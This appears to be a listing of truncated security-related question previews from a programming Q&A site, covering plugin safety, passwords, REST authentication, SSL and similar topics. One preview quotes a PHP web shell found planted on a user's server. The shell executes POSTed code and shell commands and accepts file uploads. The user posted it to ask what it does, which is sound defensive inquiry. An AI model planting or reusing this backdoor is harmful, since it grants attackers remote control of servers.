security

Reduce chances of PHP plugins being malicious

Hey all, I was wondering what steps you use to keep downloaded plugins from being malicious? For example, what does WordPress do to ensure that the plugins you download do not simply execute unlink('/')? I'm assuming it partly depends on the downloader installing plugins to use his or her own discretion, but do plugin systems take m...

Disallowing characters in a password?

Is there something special about characters that should be allowed/not allowed in a password? I store the password in the db hashed/salted and use PDO to prevent injection. Is what I'm doing enough? Recently I came across a system that disallowed a number of characters; I don't remember all of them, but one was the ampersand &. W...

SQL Server 2008 create database issue

Hello everyone, I want to create a SQL Server 2008 database, and I need to create the database on a network shared location, like \\10.10.10.123\share, but this network shared location is protected by a username and password. My question is, how to assign such username and password in SQL Server create database statement? BTW: I have ...

JAVA - How to store and read an RSA public key from an sqlite db

Hi, I have to store a public key and a private one in a sqlite database. Currently I write pubKey.getEncoded() into the database, and to recreate the pubkey I use the following code: ResultSet result = stat.executeQuery("select publickey from cert where id='1'"); KeyFactory rsaKeyFac = KeyFactory.getInstance("RSA"); X...

How to detect which content is not secured on a mixed content SSL page?

I've added an SSL certificate to an existing site, and now in IE I get a mixed content warning. Problem is, I don't know what the non-secure content IE is warning me about is. It's a simple html page, with a few Flash, a few images, a loaded CSS and JS. How can I find out what the non-secured content is? Edit: I found the culprit: it's...

Any Spring Framework support for REST security?

I am about to implement security for my RESTful services based on the Spring framework. Actually, I have never secured RESTful WS before, but I've got myself a good introduction here. Basically, Amazon S3 or even OAuth are suggested as good examples. My questions: Does the Spring framework provide these strategies out-of-the-box? If ...

AS3 ActionScript not running from the timeline on a loaded MovieClip

I have an AS3 Flash file with some animations during the timeline. On the timeline I also have a stop() in the middle (on a keyframe). When I run this SWF file it does stop. But if I load it from another Flash file using a Loader object it does not stop (nor run any other ActionScript, i.e. trace("hi")). I'm also including the context...

Managing a rapidly growing web site

I am developing a project that has lately been taking off with increased popularity. This development is of course met with open arms and has also been somewhat expected. I have therefore taken every precaution I could about creating efficient and secure code. However, when it comes to server capacity I haven't had the financial means ...

REST Layer Security And Integration

I have a widget-based front end talking to a REST layer. To use the front end, a human needs to log in with a username and password. Once in, the user can interact with the widgets, which make calls to the REST layer. At this point, no authorization is done at the REST layer. If you have logged in successfully, you can do whatever you w...

Opinion requested: Web service security using a pseudo-security token service and secure remote password

Hello. Where I work, there's quite a bit of discussion about web service security since we want to retire our (costly) PKI solution. The buzz at the moment seems to be secure remote password (SRP), which seems to promise equivalent resilience without the need for a trusted third-party. The downside is that it is not widely implemented,...

secure random numbers in asp.net

From what I know, Random() is initialized to the current time. If two connections hit during the same second, I should get the same two random numbers? With a large site that can be likely. Locking is bad, so how should I solve it? Note: the number is used for the session id. Edit: I am stuck using a long. It feels wrong to shorten a 128bi...

How safe is code hosted elsewhere

I was at a meeting recently for our startup. For half an hour, I was listening to one of the key people on the team talk about timelines, the market, confidentiality, being there first and so on. But I couldn't help ask myself the question: all that talk about confidentiality is nice, but there isn't much talk about physical security. Th...

GitHub and Source Code Protection and Control

Hey guys! I am working in a small startup organization with approximately 12 - 15 developers. We recently had an issue with one of our servers whereby the entire server was "re-provisioned", i.e. completely wiped of all the code, databases, and information on it. Our hosting company informed us that only someone with access to the ser...

Security precautions when submitting log-in information with AJAX

Hello everyone, I am in the process of writing a login/register form for my MVC website and am facing an issue regarding security and AJAX. It seems that more and more popular sites are utilizing JavaScript to process logins, and many from a non-https URL (www.giantbomb.com and www.gametrailers.com to name two). I'm wondering if there...

Security: Brute-forcing GET-requests by URL?

Hi everybody, what should my concerns be if I were about to make an application that handles logins the following way: http://api.myApp.example/printSomething/username/password/ How insecure is it compared to a normal login page that is based on POSTed user details (username+password)? Is there a difference? Thanks ...

What's the purpose of this PHP code/hack?

I recently found 4 bizarre files on my server (that I didn't upload). The filenames were like this: goog1e7a20543b128921.php And here's the code that was inside them: Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES...

FFserver: Securing with HTTP Authentication? (Apache?)

Is there some way to secure an ffserver webcam stream using Apache / HTTP Authentication? Some type of Apache proxy perhaps? Right now I have it so only machines on the LAN can view http://webcam/stream.mjpg, but I want people from the outside to be able to access it if they provide a username / password (HTTP Auth, which isn't built int...

Security in distributed web applications system

I have a set of three web application systems - A, B & C that are used to service my application. The A system has the core business logic and also stores user/account data for the entire application. The systems B & C are required to provide additional functionality to the application. I was thinking of a security mechanism where a us...

Are JavaScript comments a security risk?

During a recent PCI audit the auditor said that we had major security risks because it was possible to download static resources from our website, such as images, CSS and JavaScript, without prior authentication. Our JavaScript had comments in it. Personally I think that this is not a security risk at all. The images, CSS and JavaScri...

Don't save URL in history, any header or meta-tag?

Are there any HTTP headers or meta tags one can use to avoid getting a URL into the browser history? For example, I don't want http://domain.td/show/super-secret-unique-token-that-is-private to show up in the browser URL bar when I start typing "domain.t". Currently I have a (POST) search form on the website to load the tokens, and ...